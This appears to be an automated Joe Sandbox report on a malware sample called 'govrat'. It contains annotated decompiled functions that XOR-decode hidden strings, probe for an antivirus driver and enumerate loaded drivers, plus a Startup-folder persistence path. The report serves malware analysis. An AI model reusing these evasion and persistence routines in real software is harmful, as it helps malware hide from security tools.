    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 20%
    			E0095D184() {
    				intOrPtr _v16;
    				void* _t3;
    				void* _t6;
    				void* _t8;
    
    				_push(0);
    				_push(0);
    				_push(1);
    				_push(0);
    				_t3 = L009C2812(0, _t6);
    				_push(_v16);
    				_t8 = _t3;
    				_push(_t8);
    				_push(_t3); // executed
    				L00A145E0(); // executed
    				return CloseHandle(_t8);
    			}
    Addresses: 0x0095d187 0x0095d188 0x0095d189 0x0095d18b 0x0095d18d 0x0095d192 0x0095d196 0x0095d198 0x0095d199 0x0095d19a 0x0095d1a7

    APIs
    • CloseHandle.KERNEL32(00000000), ref: 0095D1A0
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000001.00000001.13428611401.0000000000A18000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000001.13428594815.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000001.13428806062.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_950000_govrat.jbxd

    Non-executed Functions

    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.13428611401.0000000000A18000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000001.13428594815.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000001.13428806062.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_950000_govrat.jbxd
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    Memory Dump Source
    • Source File: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,00973288,00000314,00000000), ref: 00958A13
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00958A31
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00958A41
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00958A51
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00958A65
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • _wcslen.LIBCMT ref: 009526E5
    • _wcslen.LIBCMT ref: 009526F2
      • Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,00973288,00000314,00000000), ref: 00958A13
      • Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00958A31
      • Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00958A41
      • Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00958A51
      • Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00958A65
    • _strlen.LIBCMT ref: 009527A5
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • GetProcAddress.KERNEL32(00000000,32336C65,?,LoadLibraryA), ref: 00961C79
    • GetProcAddress.KERNEL32(00000000,?), ref: 00961C9D
    • GetProcAddress.KERNEL32(00000000), ref: 00961CAE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • CloseHandle.KERNEL32(00000004), ref: 00962FEB
    • GetProcAddress.KERNEL32(?,?,?,00000000,0000003C), ref: 00963020
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
      • Part of subcall function 00968CBF: __fltout2.LIBCMT ref: 00968CEE
    • __fltout2.LIBCMT ref: 0096930B
      • Part of subcall function 00969AE7: ___dtold.LIBCMT ref: 00969B0D
      • Part of subcall function 00969AE7: _$I10_OUTPUT.LIBCMT ref: 00969B28
      • Part of subcall function 00969981: _strlen.LIBCMT ref: 00969A1C
    • __cftof2_l.LIBCMT ref: 00969398
      • Part of subcall function 0096911C: _strlen.LIBCMT ref: 0096919A
      • Part of subcall function 0096911C: _strlen.LIBCMT ref: 009691BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • __fltout2.LIBCMT ref: 00968CEE
      • Part of subcall function 00969AE7: ___dtold.LIBCMT ref: 00969B0D
      • Part of subcall function 00969AE7: _$I10_OUTPUT.LIBCMT ref: 00969B28
      • Part of subcall function 00969981: _strlen.LIBCMT ref: 00969A1C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • __fltout2.LIBCMT ref: 0096924A
      • Part of subcall function 00969AE7: ___dtold.LIBCMT ref: 00969B0D
      • Part of subcall function 00969AE7: _$I10_OUTPUT.LIBCMT ref: 00969B28
      • Part of subcall function 00969981: _strlen.LIBCMT ref: 00969A1C
    • __cftof2_l.LIBCMT ref: 009692C9
      • Part of subcall function 0096911C: _strlen.LIBCMT ref: 0096919A
      • Part of subcall function 0096911C: _strlen.LIBCMT ref: 009691BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • _parse_cmdline.LIBCMT ref: 00957CC7
      • Part of subcall function 00958F8E: Sleep.KERNEL32(00000000,00000001,00951398,?,009583EF,00000018,00970B60,0000000C,0095847F,00951398,00000000,?,0095245F,00000008,00970A70,00000020), ref: 00958FAF
    • _parse_cmdline.LIBCMT ref: 00957D08
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • RegQueryValueExW.ADVAPI32(?,00000002,?,?,?,?), ref: 00960B42
    • RegQueryValueExW.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00960B64
    Strings
    • C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe, xrefs: 00960B11
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,mscoree.dll,?,00952341,00951398,?,009511C4,000000FF,0000001E,00000001,00000000,00000000,?,00958F9F), ref: 00952323
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Execution Graph

    Execution Coverage:3.1%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:6.8%
    Total number of Nodes:325
    Total number of Limit Nodes:25

    Graph

    execution_graph: Graphviz node/edge listing that the original report renders as an image (325 nodes, 25 limit nodes, see the counters above; the raw edge list is not reproduced here). Nodes the plugin labelled with API or library calls, by address:
    • 12cfe2e (E012CFE2E below): GetProcAddress at 12cfe62 and 12cfeb4, K32EnumDeviceDrivers at 12cfecb and 12cfeea, K32GetDeviceDriverBaseNameW at 12cff03; the compare helper 12c1c05 (8 API calls, 2 library calls)
    • 12d07fd: GetProcAddress, FindFirstFileA; 12d0889: GetProcAddress (E012D0762 below, the driver-file probe)
    • 12d5f07 -> 12d5f14: 6 API calls (E012D5F07 below, the winsock resolver); 12d5ab1: GetProcAddress x 3 (E012D5A5F below, the shell32 resolver); 12d594e, 12d5996, 12d59c8, 12d59fa, 12d5a2c: GetProcAddress (five resolutions inside 12d58ab); 12cd219: GetProcAddress
    • 12cd779, 12cd816, 12cd8e6, 12cd970: RegQueryValueExW (four successive registry reads)
    • 12d1539: CreateThread, CloseHandle, CreateThread; 12d156a: CreateThread; 12d1488 and 12d1af3: RtlExitUserThread; 12cd19f: CloseHandle
    • 12d0159: SendMessageW; 12cf9fa: SendMessageW, Sleep (polling loop)
    • 12d02b6: 15 API calls, 3 library calls; 12d03c5: 17 API calls (setSBCS); 12d524e: 7 API calls (setSBCS); 12d106c: 16 API calls; 12d0bbc: 8 API calls; 12d3675: 8 API calls (_vswprintf_s)
    • CRT start-up and shutdown: 12c20ff ... 12c2216 (__RTC_Initialize, __initterm_e, __CxxUnhandledExceptionFilter, _parse_cmdline, _strlen, __woutput_s_l); 12c2334: GetProcAddress, ExitProcess, __amsg_exit; __amsg_exit paths with 5 to 8 API calls at 12c20c0, 12c25d6, 12c258c, 12c25b8, 12c27c9, 12c261a; 12c8fd6 / 12c8ffd: __input_s_l, Sleep (retry loop)
    • Pointer encoding: 12c8712: RtlDecodePointer x 2; 12c879f: RtlEncodePointer x 2; 12c3626: RtlEncodePointer x 4 followed by RtlDecodePointer at 12c3663 and 12c3690
    • Thread-local storage: 12c356c: GetProcAddress x 4 (E012C355D below, CRT FLS set-up); 12c3268: TlsGetValue; 12c3289: TlsSetValue; 12c329c: TlsFree
    • Further CRT helpers summarised by the plugin as "7 API calls" or "8 API calls": 12c1195, 12c1d71, 12cc795, 12c1c90, 12c13d6, 12c2eff, 12c8f8e, 12cb01c, 12c9022, 12cabc7, 12c95a0, 12c5471, 12c543e, 12c3406, 12c31dd, 12c2a5c, 12c391c, 12c83a2, 12c32d9

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 38%
    			E012D0762(char __ebx, void* __ecx, void* __edx, void* __edi) {
    				void* _t51;
    				void* _t56;
    				void* _t59;
    				struct HINSTANCE__* _t61;
    				void* _t63;
    				void* _t64;
    				void* _t65;
    				struct HINSTANCE__* _t67;
    				_Unknown_base(*)()* _t68;
    				void* _t71;
    				CHAR* _t78;
    				intOrPtr* _t82;
    				intOrPtr* _t84;
    				CHAR* _t85;
    				void* _t88;
    
    				 *((intOrPtr*)(_t88 - 5)) = 0x65391617; // XOR-encoded stack string at ebp-0x14..ebp-2, key 0x65
    				 *((intOrPtr*)(_t88 - 9)) = 0x130c17;
    				 *((intOrPtr*)(_t88 - 0xd)) = 0x1395756;
    				 *((intOrPtr*)(_t88 - 0x11)) = 0x8001116;
    				 *((short*)(_t88 - 0x13)) = 0x1c16;
    				 *((char*)(_t88 - 0x14)) = 0x39;
    				 *((char*)(_t88 - 1)) = __ebx; // decode flag: 0 (ebx) while still encoded, set to 1 once decoded
    				_t51 = 0;
    				do {
    					 *(_t88 + _t51 - 0x14) =  *(_t88 + _t51 - 0x14) ^ 0x00000065; // 0x13 bytes ^ 0x65 -> "\system32\drivers\"
    					_t51 = _t51 + 1;
    				} while (_t51 < 0x13);
    				_pop(_t84);
    				E0132FF8A(_t51, __ebx, __ecx, __edi, _t84);
    				 *((char*)(_t88 - 1)) = 1;
    				 *_t84(_t88 - 0x130, _t88 - 0x14); // call through a run-time-resolved pointer with (path buffer at ebp-0x130, decoded prefix)
    				 *((intOrPtr*)(_t88 - 0x1b)) = 0x66151f15; // second encoded string at ebp-0x21..ebp-0x18, key 0x66
    				 *((intOrPtr*)(_t88 - 0x1f)) = 0x48000d05;
    				 *((short*)(_t88 - 0x21)) = 0x1007;
    				 *((char*)(_t88 - 0x17)) = __ebx; // decode flag
    				_t56 = 0;
    				do {
    					 *(_t88 + _t56 - 0x21) =  *(_t88 + _t56 - 0x21) ^ 0x00000066; // 0xa bytes ^ 0x66 -> "avckf.sys"
    					_t56 = _t56 + 1;
    				} while (_t56 < 0xa);
    				 *((char*)(_t88 - 0x17)) = 1;
    				_t59 =  *_t84(_t88 - 0x130, _t88 - 0x21); // same resolved call with (path buffer, "avckf.sys"): the buffer now names a driver file
    				_pop(_t82);
    				E012EF5E8(_t59, __ebx, __edx, _t82);
    				_t85 = "kernel32";
    				_t61 =  *_t82(_t85); // run-time-resolved module lookup for "kernel32"
    				if(_t61 == __ebx) { // no module handle (ebx == 0)
    					_push(_t85);
    					return E0135886A(_t61, _t82);
    				}
    				GetProcAddress(_t61, "FindFirstFileA"); // executed; the returned pointer is discarded, the import is called directly below
    				_t78 = _t88 - 0x130;
    				_t63 = FindFirstFileA(_t78, _t88 - 0x270); // executed; probes for the driver file whose path was built above
    				 *(_t88 - 0x28) = _t63;
    				if(_t63 != 0xffffffff) { // 0xffffffff is INVALID_HANDLE_VALUE: file absent
    					 *((intOrPtr*)(_t88 - 5)) = 0x7510061a; // encoded string at ebp-0xb..ebp-2, key 0x75
    					 *((intOrPtr*)(_t88 - 9)) = 0x1936111b;
    					 *(_t88 - 0xb) = 0x1c33;
    					 *((char*)(_t88 - 1)) = __ebx; // decode flag
    					_t64 = 0;
    					do {
    						 *(_t88 + _t64 - 0xb) =  *(_t88 + _t64 - 0xb) ^ 0x00000075; // 0xa bytes ^ 0x75 -> "FindClose"
    						_t64 = _t64 + 1;
    					} while (_t64 < 0xa);
    					 *((char*)(_t88 - 1)) = 1;
    					 *((intOrPtr*)(_t88 - 0x1b)) = 0x75474619; // encoded string at ebp-0x20..ebp-0x18, key 0x75
    					 *((intOrPtr*)(_t88 - 0x1f)) = 0x101b0710;
    					 *((char*)(_t88 - 0x20)) = 0x1e;
    					 *((char*)(_t88 - 0x17)) = __ebx; // decode flag
    					_t65 = 0;
    					do {
    						 *(_t88 + _t65 - 0x20) =  *(_t88 + _t65 - 0x20) ^ 0x00000075; // 9 bytes ^ 0x75 -> "kernel32"
    						_t65 = _t65 + 1;
    					} while (_t65 < 9);
    					 *((char*)(_t88 - 0x17)) = 1;
    					_t67 =  *_t82(_t88 - 0x20); // module lookup for "kernel32" again, this time via the decoded name
    					if(_t67 == __ebx) {
    						_push(_t88 - 0x20);
    						_push(_t78);
    						_t67 = E0131502A(_t88 - 0x20, _t82);
    					}
    					_t68 = GetProcAddress(_t67, _t88 - 0xb); // GetProcAddress(kernel32, "FindClose")
    					 *_t68( *(_t88 - 0x28)); // FindClose(find handle)
    					_t71 = 1; // driver file present
    				} else {
    					_t71 = 0; // driver file absent
    				}
    				return _t71;
    			}

    Instruction address for each of the 73 body lines above, in order (0x00000000 marks a line the decompiler could not map to an instruction): 0x012d0762, 0x012d0769, 0x012d0770, 0x012d0777, 0x012d077e, 0x012d0784, 0x012d0788, 0x012d078b, 0x012d078d, 0x012d078d, 0x012d0792, 0x012d0793, 0x012d0798, 0x012d0799, 0x012d07a9, 0x012d07ad, 0x012d07af, 0x012d07b6, 0x012d07bd, 0x012d07c3, 0x012d07c6, 0x012d07c8, 0x012d07c8, 0x012d07cd, 0x012d07ce, 0x012d07de, 0x012d07e2, 0x012d07e4, 0x012d07e5, 0x012d07ea, 0x012d07f0, 0x012d07f4, 0x012d07f6, 0x00000000, 0x012d07f7, 0x012d0809, 0x012d0812, 0x012d0819, 0x012d081b, 0x012d0821, 0x012d0827, 0x012d082e, 0x012d0835, 0x012d083b, 0x012d083e, 0x012d0840, 0x012d0840, 0x012d0845, 0x012d0846, 0x012d084b, 0x012d084f, 0x012d0856, 0x012d085d, 0x012d0861, 0x012d0864, 0x012d0866, 0x012d0866, 0x012d086b, 0x012d086c, 0x012d0875, 0x012d0879, 0x012d087d, 0x012d0882, 0x012d0883, 0x012d0884, 0x012d0884, 0x012d088e, 0x012d0893, 0x012d0897, 0x012d0823, 0x012d0823, 0x012d0823, 0x012d089c

    APIs
    • GetProcAddress.KERNEL32(00000000,FindFirstFileA), ref: 012D0809
    • FindFirstFileA.KERNELBASE(?,?), ref: 012D0819
    • GetProcAddress.KERNEL32(00000000,00000075), ref: 012D088E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    C-Code - Quality: 87%
    			E012CFE2E(struct HINSTANCE__* __eax, signed int __ebx) {
    				void* _t45;
    				_Unknown_base(*)()* _t47;
    				void* _t48;
    				_Unknown_base(*)()* _t50;
    				void* _t51;
    				void* _t62;
    				signed int _t65;
    				void* _t67;
    				void* _t71;
    				struct HINSTANCE__* _t72;
    				void* _t74;
    				void* _t79;
    
    				_t65 = __ebx; // ebx is 0 here: used as the loop index and as the null value in the compares below
    				_t72 = __eax; // module handle passed in; the two exports below are resolved from it
    				 *((intOrPtr*)(_t79 - 0x11)) = 0xf2818097; // XOR-encoded stack string at ebp-0x1f..ebp-0xe, key 0xf2
    				 *((intOrPtr*)(_t79 - 0x15)) = 0x849b80b6;
    				 *((intOrPtr*)(_t79 - 0x19)) = 0x97919b84;
    				 *((intOrPtr*)(_t79 - 0x1d)) = 0x97b69f87;
    				 *(_t79 - 0x1f) = 0x9cb7;
    				 *((char*)(_t79 - 0xd)) = __ebx; // decode flag: 0 while still encoded, 1 once decoded
    				_t45 = 0;
    				do {
    					 *(_t79 + _t45 - 0x1f) =  *(_t79 + _t45 - 0x1f) ^ 0x000000f2; // 0x12 bytes ^ 0xf2 -> "EnumDeviceDrivers"
    					_t45 = _t45 + 1;
    				} while (_t45 < 0x12);
    				 *((char*)(_t79 - 0xd)) = 1;
    				_t47 = GetProcAddress(__eax, _t79 - 0x1f); // executed: resolves EnumDeviceDrivers
    				 *(_t79 - 0x40) = _t47;
    				 *((intOrPtr*)(_t79 - 0x24)) = 0xf3a4969e; // second encoded string at ebp-0x39..ebp-0x21, key 0xf3
    				 *((intOrPtr*)(_t79 - 0x28)) = 0x92bd9680;
    				 *((intOrPtr*)(_t79 - 0x2c)) = 0x92b18196;
    				 *((intOrPtr*)(_t79 - 0x30)) = 0x859a81b7;
    				 *((intOrPtr*)(_t79 - 0x34)) = 0x96909a85;
    				 *((intOrPtr*)(_t79 - 0x38)) = 0x96b78796;
    				 *(_t79 - 0x39) = 0xb4;
    				 *((char*)(_t79 - 0x20)) = __ebx; // decode flag
    				_t48 = 0;
    				do {
    					 *(_t79 + _t48 - 0x39) =  *(_t79 + _t48 - 0x39) ^ 0x000000f3; // 0x19 bytes ^ 0xf3 -> "GetDeviceDriverBaseNameW"
    					_t48 = _t48 + 1;
    				} while (_t48 < 0x19);
    				 *((char*)(_t79 - 0x20)) = 1;
    				_t50 = GetProcAddress(_t72, _t79 - 0x39); // executed: resolves GetDeviceDriverBaseNameW
    				 *(_t79 - 8) = _t50;
    				if( *(_t79 - 0x40) == __ebx || _t50 == __ebx) { // either export unresolved: return 0
    					L14:
    					_t51 = 0;
    				} else {
    					 *(_t79 - 0x40)(_t79 - 0x44, 4, _t79 - 0xc); // EnumDeviceDrivers(&scratch, 4, &cbNeeded): size query
    					_t77 =  *(_t79 - 0xc);
    					_t88 =  *(_t79 - 0xc) - __ebx;
    					if( *(_t79 - 0xc) == __ebx) { // no drivers reported
    						goto L14;
    					} else {
    						_t74 = E012CC795(_t71, _t77, _t88); // allocate cbNeeded bytes for the driver base-address array
    						if(_t74 == __ebx) {
    							goto L14;
    						} else {
    							_push(_t79 - 0x44);
    							_push( *(_t79 - 0xc));
    							_push(_t74); // executed
    							if( *(_t79 - 0x40)() == 0) { // EnumDeviceDrivers(array, cbNeeded, &scratch)
    								L13:
    								E012C115B(_t67, _t71, _t77, _t74); // free the array
    								goto L14;
    							} else {
    								_t77 =  *(_t79 - 0xc) >> 2; // entry count = bytes / sizeof(LPVOID)
    								if(_t77 > __ebx) {
    									do {
    										_push(0x400);
    										_push(_t79 - 0x844);
    										_push( *((intOrPtr*)(_t74 + _t65 * 4)));
    										if( *(_t79 - 8)() == 0) { // GetDeviceDriverBaseNameW(array[i], nameBuf, 0x400)
    											goto L12;
    										} else {
    											_t62 = E012C1C05(_t79 - 0x844,  *((intOrPtr*)(_t79 + 8))); // __wcsicoll(nameBuf, driver name passed by the caller at [ebp+8]); see the APIs list below
    											_pop(_t67);
    											if(_t62 == 0) { // case-insensitive match: a driver with that name is loaded
    												E012C115B(_t67, _t71, _t77, _t74); // free the array
    												_t51 = 1; // found
    											} else {
    												goto L12;
    											}
    										}
    										goto L15;
    										L12:
    										_t65 = _t65 + 1;
    									} while (_t65 < _t77);
    								}
    								goto L13;
    							}
    						}
    					}
    				}
    				L15:
    				return _t51;
    			}

    Instruction address for each of the 84 body lines above, in order (0x00000000 marks a line the decompiler could not map to an instruction): 0x012cfe2e, 0x012cfe2e, 0x012cfe30, 0x012cfe37, 0x012cfe3e, 0x012cfe45, 0x012cfe4c, 0x012cfe52, 0x012cfe55, 0x012cfe57, 0x012cfe57, 0x012cfe5c, 0x012cfe5d, 0x012cfe6d, 0x012cfe71, 0x012cfe73, 0x012cfe76, 0x012cfe7d, 0x012cfe84, 0x012cfe8b, 0x012cfe92, 0x012cfe99, 0x012cfea0, 0x012cfea4, 0x012cfea7, 0x012cfea9, 0x012cfea9, 0x012cfeae, 0x012cfeaf, 0x012cfeb9, 0x012cfebd, 0x012cfebf, 0x012cfec5, 0x012cff3a, 0x012cff3a, 0x012cfecb, 0x012cfed5, 0x012cfed8, 0x012cfedb, 0x012cfedd, 0x00000000, 0x012cfedf, 0x012cfee4, 0x012cfee8, 0x00000000, 0x012cfeea, 0x012cfeed, 0x012cfeee, 0x012cfef1, 0x012cfef7, 0x012cff33, 0x012cff34, 0x00000000, 0x012cfef9, 0x012cfefc, 0x012cff01, 0x012cff03, 0x012cff03, 0x012cff0e, 0x012cff0f, 0x012cff17, 0x00000000, 0x012cff19, 0x012cff23, 0x012cff29, 0x012cff2c, 0x012cff42, 0x012cff4a, 0x00000000, 0x00000000, 0x00000000, 0x012cff2c, 0x00000000, 0x012cff2e, 0x012cff2e, 0x012cff2f, 0x012cff03, 0x00000000, 0x012cff01, 0x012cfef7, 0x012cfee8, 0x012cfedd, 0x012cff3c, 0x012cff40

    APIs
    • GetProcAddress.KERNEL32(?,000000F2), ref: 012CFE71
    • GetProcAddress.KERNEL32(?,000000F3), ref: 012CFEBD
    • K32EnumDeviceDrivers.KERNEL32(?,00000004,?,?,000000F3), ref: 012CFED5
    • K32EnumDeviceDrivers.KERNEL32(00000000,?,?,?,000000F3), ref: 012CFEF2
    • K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400,?,000000F3), ref: 012CFF12
    • __wcsicoll.LIBCMT ref: 012CFF23
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
